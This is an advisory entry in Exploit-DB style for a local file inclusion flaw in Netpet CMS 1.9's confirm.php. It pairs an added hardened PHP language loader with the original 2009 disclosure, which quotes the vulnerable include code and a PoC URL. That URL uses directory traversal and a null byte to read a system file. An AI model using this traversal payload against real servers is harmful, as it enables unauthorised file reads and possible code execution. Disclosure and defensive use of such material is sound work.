Vendor: Netpet CMS
By: SirGod
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: Netpet CMS
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability

Netpet CMS 1.9 is vulnerable to a local file inclusion vulnerability due to insufficient sanitization of user-supplied input to the 'language' parameter in the 'confirm.php' script. An attacker can exploit this vulnerability to include arbitrary files from the web server, potentially leading to the execution of arbitrary code.

Mitigation:

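The 'language' parameter should be validated before 'confirm.php' uses it to build the include path, so that user-supplied input is properly sanitized and cannot select files outside the languages directory.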
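One way to apply that validation to the include in netpet/confirm.php, as an added example that is not Netpet's code or part of the original advisory. The function name `resolve_language_file` and the temporary demo directory are hypothetical; `$langDir` stands in for `$netpetfolder."netpet/languages/"`, and the sample inputs are constructed.

```php
<?php
// Added example: hardened language loader (hypothetical names, not Netpet code).

/**
 * Resolve a language code to a file inside $langDir, or return null.
 * $langDir stands in for $netpetfolder."netpet/languages/".
 */
function resolve_language_file(string $langDir, $requested): ?string
{
    // 1. Shape check: short alphabetic codes only ("en", "de", "pt_BR").
    //    Rejects "/", "\", ".", NUL bytes and non-string input such as arrays.
    if (!is_string($requested) || !preg_match('/\A[a-z]{2}(_[A-Z]{2})?\z/', $requested)) {
        return null;
    }

    // 2. Allowlist: the code must match a file that actually ships in $langDir.
    $available = [];
    foreach (glob($langDir . '/*.lang.php') ?: [] as $file) {
        $available[basename($file, '.lang.php')] = $file;
    }
    if (!isset($available[$requested])) {
        return null;
    }

    // 3. Containment: the resolved path must still sit under $langDir
    //    (catches symlinks that point outside it).
    $base = realpath($langDir);
    $real = realpath($available[$requested]);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo: a temporary directory with two language files.
$dir = sys_get_temp_dir() . '/netpet_lang_demo_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/en.lang.php", '<?php $lang = ["ok" => "Confirm"];');
file_put_contents("$dir/de.lang.php", '<?php $lang = ["ok" => "Bestätigen"];');

$inputs = ['en', 'de', 'fr', "../../../../../../../boot.ini\0", ['en'], ''];
foreach ($inputs as $in) {
    $path = resolve_language_file($dir, $in);
    printf("%-45s => %s\n", json_encode($in), $path === null ? 'rejected' : basename($path));
}

array_map('unlink', glob("$dir/*.lang.php"));
rmdir($dir);
```

Only `en` and `de` resolve to a file; the traversal string from the PoC, the unknown code, the array and the empty string are all rejected. In confirm.php the caller would include the returned path and fall back to a fixed default language when the result is null.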

Exploit-DB raw data:

############################################################################################
[+] Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
############################################################################################

[+] Download : http://www.netpet.at/en/downloads

[+] Local File Inclusion

  - Vulnerable code in netpet/confirm.php

------------------------------------------------------------------------
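$selLang = $_GET['language'];   // attacker-controlled, never validated
if($selLang!=""){
	// the value is concatenated straight into the include path
	include $netpetfolder."netpet/languages/".$selLang.".lang.php";
}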
------------------------------------------------------------------------

  - PoC

   http://127.0.0.1/[path]/netpet/confirm.php?language=../../../../../../../boot.ini%00

############################################################################################

# milw0rm.com [2009-08-03]